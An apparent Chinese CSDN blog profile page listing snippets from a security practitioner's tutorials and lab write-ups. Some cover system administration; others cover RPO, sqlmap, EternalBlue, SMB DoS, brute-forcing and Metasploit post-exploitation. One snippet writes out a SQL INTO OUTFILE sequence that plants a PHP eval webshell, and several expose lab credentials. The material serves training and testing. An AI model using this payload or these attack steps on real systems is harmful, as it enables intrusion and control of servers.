![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
技术贴
文章平均质量分 76
Cwillchris
一个安全人
展开
-
相对路径覆盖漏洞攻击RPO详解
此攻击方法依赖于浏览器和服务器的反应,基于服务器的Web缓存技术和配置差异,以及服务器和客户端浏览器的解析差异,利用前端代码中加载的css/js的相对路径来加载其他文件,最终浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。这就是相对路径覆盖攻击, 我们成功用/aaa目录下的b.js覆盖掉了a.html中静态资源b.js的路径.如果我们控制网站根目录下的aaa的目录下面的b.js的内容,写入/aaa/b.js内容如下。输入如下代码,保存退出。原创 2022-09-26 14:42:25 · 3997 阅读 · 0 评论 -
centos根分区扩容,扩展磁盘
我们使用centos系统过程被提示空间不足,大概率是根分区满了,要进行扩容1、 查看磁盘使用情况,发现根分区可用容量只有14M了df -h2、查看硬盘数量和分区情况,sbd为新磁盘且未进行分配fdisk -l3、对未分配的sbd进行分区创建新分区fdisk /dev/sdb输入 n,新建分区按回车(默认是p,也可以输入p),查看分区下面几个选项不用输入,回车输入 t,设置分区类型输入 L 列出所有分区类型代码输入8e,设置类型为Linux LVM输入 w,保存设置并退出4、 partprobe #将磁盘分区原创 2022-06-11 22:14:32 · 3851 阅读 · 0 评论 -
后渗透攻击命令和模块
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块一、命令1、arp查看内网主机2、background将当前的会话转在后台运行。从而进行新的渗透测试。如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令3、clearev清除系统,软件之类的所有登陆信息4、download、uploaddownload可以下载目标系统的文件upload可以上传本机文件到目标系统原创 2022-04-12 17:05:30 · 1329 阅读 · 0 评论 -
sqlmap使用教程大全命令大全(图文)
我们先准备一个靶机,我这里拿经典的SQL大观园靶机我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1一、SQLmap基础操作1.判断是否存在注入假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.原创 2022-03-15 15:30:33 · 61104 阅读 · 8 评论 -
爆php路径拿shell方法
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!!方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';-原创 2021-12-23 17:02:44 · 498 阅读 · 0 评论 -
get post 两种传参的区别
GET在浏览器回退时是无害的,而POST会再次提交请求。GET产生的URL地址可以被Bookmark,而POST不可以。GET请求会被浏览器主动cache,而POST不会,除非手动设置。GET请求只能进行url编码,而POST支持多种编码方式。GET请求参数会被完整保留在浏览器历史记录里,而POST中的参数不会被保留。GET请求在URL中传送的参数是有长度限制的,而POST么有。对参数的数据类型,GET只接受ASCII字符,而POST没有限制。GET比POST更不安全,因为参数直接暴露在URL上原创 2021-12-23 16:08:06 · 1375 阅读 · 0 评论 -
windows同时安装python2和3并随时切换
python2 64位下载地址:https://www.python.org/ftp/python/2.7.18/python-2.7.18.msipython3 64位下载地址:https://www.python.org/ftp/python/3.10.1/python-3.10.1-amd64.exe建议先在安装磁盘新建Python,子目录新建Python2和Python3,方便后续切换Python2点开安装包直接安装,一直下一步就可以,注意切换一下安装目录Python3请参照原创 2021-12-22 15:21:33 · 1512 阅读 · 0 评论 -
burpsuite和fiddle进行串联抓手机包,解决burpsuite抓手机包慢的问题
我们用burpsuite抓手机的包,比如公众号、小程序、浏览器、APP,会发现手机端响应速度特别慢,效率很低,而且经常抓不到包,况且有的app(小程序)的某些功能点是对响应时间有要求的,如果使用burp响应过慢,app那边已经显示超时了。那么我们引入另一个工具fiddle,让你的抓包快的飞起,瞬间响应,话不多说上教程burpsuite安装和设置请看我其他文章让电脑和手机处于同一WIFI,最好是电脑发射热点,让手机连电脑按win+R,输入cmd,打开命令窗口,输入ipconfig,原创 2021-12-21 15:44:48 · 3286 阅读 · 0 评论 -
Jboss安装与部署实验
实验名称: JBoss安装与部署 实验人 XX 日期 2021.7.7 实验目的: 通过对JBoss的安装与部署,了解JBoss部署流程 实验环境: 操作系统:CentOS7.3 实验步骤: 压缩包准备(自行下载,不会可私我) ...原创 2021-10-20 16:25:30 · 291 阅读 · 0 评论 -
Elk日志服务器群集部署
实验名称: Elk日志服务器群集部署 实验人 XX 日期 2021.7.22 实验目的: 完成elk日志服务器部署 实验环境: 操作系统:CentOS7.3 实验步骤: 运行实验环境 两台centos7,所需安装包 部署elasticsearc...原创 2021-10-20 16:05:54 · 168 阅读 · 0 评论 -
配置kali安装源为国内源及apt命令解析
一、配置apt国内源因为Kali自带的源是国外的,经常会因为网络问题,而无法安装或更新软件包。而且国外的源速度很慢。所以我们直接使用国内的源,方便快速#中科大Kai源vim /etc/apt/sources.list注释掉第二行,添加如下deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling ..原创 2021-10-19 20:35:00 · 4644 阅读 · 2 评论 -
kali防火墙命令集合
一、首先需要安装ufw命令# apt-get install ufw二、ufw命令使用实例如下:检查防火墙的状态(默认 inactive) # ufw status防火墙版本 # ufw version启动ufw防火墙 # ufw enable关闭ufw防火墙 # ufw disable默认禁止访问所有 # ufw default deny开放22/TCP端口 # ufw allow 22/tcp开放53端口(tcp/udp) # ufw allow 53禁止外部访问原创 2021-10-19 20:31:47 · 2531 阅读 · 0 评论 -
安装kali并进行网络、安装源等初始化配置教程
实验环境:VMware软件 Kali镜像实验步骤:一、安装Kalikali安装包下载地址:Get Kali | Kali Linux选择下图中间的安装包,点击↓进行下载打开VMware,点文件——新建虚拟机新建虚拟机网络设置可以选择先不进行设置域名服务器不用设置安装完成自动重启,用户名:will 密码:123进行登录二、初始化配置1.原创 2021-10-18 10:17:38 · 4916 阅读 · 2 评论 -
利用MSF渗透windows系统,windows数据库,linux系统实验
实验环境:kali:172.16.12.30windows靶机:172.16.12.4 用户名:administrator 密码:vgrantcentos靶机:172.16.12.11 用户名:root 密码:123实验步骤:一、攻击LINUX服务器1、扫描目标机获取哪些服务和端口开启┌──(root????kali)-[~/desktop]└─# msfdb runmsf6 > db_nmap -A -v 172.16.12.4查看目标器服务列表原创 2021-10-18 09:55:00 · 1632 阅读 · 0 评论 -
利用smb_loris漏洞对目标进行拒绝服务攻击(dos)
在进行 SMBloris拒绝服务攻击之前,要先设置攻击机的最大连接数。┌──(root????kali)-[~/desktop]└─# ulimit -n 655351、使用smb_loris攻击,设置目标机ip,执行msf6 > use auxiliary/dos/smb/smb_lorismsf6 auxiliary(dos/smb/smb_loris) > set rhost 172.16.12.4rhost => 172.16.12.4msf6 au原创 2021-10-18 09:40:21 · 401 阅读 · 0 评论 -
利用永恒之蓝渗透WIN7
实验名称:利用永恒之蓝渗透win7实验人:xx实验日期:2021.9.24实验目的:通过已知漏洞攻击目标服务器并拿到shell实验环境:kali:172.16.12.30win7靶机:172.16.12.4 用户名:administrator 密码:vgrant实验步骤:配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled查看MS17-010相关模块,并使用序号3扫描模块扫描目标及msf6 > search ms17-010msf6原创 2021-10-18 09:36:13 · 3868 阅读 · 7 评论 -
利用密码字典暴力破解渗透目标系统
实验名称:利用密码字典渗透目标系统实验人:XX实验日期:2021.9.23实验目的:利用SMB、FTP渗透windows,利用SSH渗透centos实验环境:kali:172.16.12.30windows靶机:172.16.12.10 用户名:administrator 密码:c!112233centos靶机:172.16.12.11 用户名:root 密码:123实验步骤:一、利用SMB远程登录模块渗透windows确保windows开启允许远程连接1、假原创 2021-10-18 09:26:44 · 2398 阅读 · 0 评论 -
安装NESSUS并进行初始化配置
实验名称:安装NESSUS进行初始化配置实验人:XX实验日期:2021.9.10实验目的:成功安装NESSUS并进行初始化配置实验环境:kali环境 NESSES安装包实验步骤:一、安装NESSUS1、下载NESSUS安装包(在kali环境中下载)下载地址:Download Nessus | Tenable®选择版本:Nessus-8.15.1-debian6_amd642、安装并启动Nessus┌──(root????kali)-[~/Desktop]原创 2021-10-18 09:22:13 · 3910 阅读 · 0 评论 -
配置内网windows域教程,模拟公司内网架构
准备两台电脑,一台为域控制器DC,即管理员的电脑,一台为域成员CY,即其他用户的电脑1、两台电脑网络模式都改为仅主机点击VMware最上面菜单栏——虚拟机——设置选择网络适配器,选择自定义,下拉菜单选择VMnet1(仅主机模式)2、域控DC网络设置如下3、域成员CY网络设置如下4、内网windows域配置1)创建windows域右击计算机——属性——高级系统设置——计算机名——更改,改为DC点击其他,后缀改成sw.org,计算机名改为DC,点击确定,然原创 2021-10-17 19:49:20 · 2182 阅读 · 0 评论 -
搭建内网靶场并用MSF进行内网穿透/渗透实验
实验名称:利用MSF打穿内网实验人:XX实验日期:2021.10.16实验目的:利用MSF进行内网渗透实验拓扑:实验环境: 所用机器 网络类型 IP 默认网关 DNS 攻击机:kali NAT 172.16.12.30/24 172.16.12.2 114.114.114.114原创 2021-10-17 16:33:42 · 3981 阅读 · 0 评论